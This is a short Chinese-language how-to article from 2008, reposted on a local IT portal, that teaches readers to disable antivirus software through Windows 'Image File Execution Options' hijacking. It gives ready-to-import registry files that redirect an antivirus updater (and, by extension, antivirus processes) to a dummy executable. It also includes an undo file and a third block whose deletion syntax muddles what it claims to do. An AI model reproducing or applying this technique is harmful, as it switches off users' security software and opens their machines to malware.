安庆IT广场,安庆最具影响力的电脑网站-★中关村在线安庆站★-安庆电脑导购专家
安庆IT广场 安庆电脑网
安庆硬件
硬  件
安庆数码
数  码
安庆整机
整  机
安庆手机
手  机
安庆办公设备
办公设备
安庆游戏
游  戏
安庆家电
家  电
安庆电脑周边
电脑周边
安庆电脑专题
专  题
 网站导航: 首 页 | 本地动态 | 硬件首页 | 数码首页 | 整机首页 | 手机首页 | 办公设备 | 游戏首页 | 家电首页 | 电脑周边 | 专题
 
 联盟导航:产品库 | 家电库 | IT视频 |  攒机  |  方案  |  首选  |  商家  |  商情  |  文库  | 小游戏 | 下载
 
中关村在线安庆站PCHOME电脑之家战略合作伙伴
 
 
 
您的位置: 安庆IT广场→安庆IT第一门户-安庆最有影响力的电脑网站-★中关村在线安庆站-电脑之家安庆站★-安庆电脑导购专家 > 安庆IT广场-文章库 >

我来教你 如何映像劫持杀毒软件

CNET中国·PChome.net   类型:转载   作者:   来源 : 天地无忧   责编:黄蔚   时间:2008-06-07

映像劫持杀毒软件

原理就这样了

下面是我做的注册表导入命令,把下面的命令粘贴到新的TXT文档中,另存为.REG后缀就行了,双击导入就行了

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\updater.exe]

"Debugger"="125.exe"

如果要恢复的话,就导入下面的命令就行

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\updater.exe]

"Debugger"="125.exe"

就多一个减号

其实要反病毒的镜像劫持的话,原理跟上面一样的

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\杀软的进程]

"Debugger"="125.exe"

举一反三就行了!

鼎宇网络旗下站点:安庆it广场 www.aqit.net.cn 安庆it门户站
地址安庆市华康电脑城B区25号 电话0556-5536833 3138757 QQ:164189771 12161636
Copyright © 2002-2006 AQIT.NET.CN All rights reserved. 备案序号:皖ICP备06009659号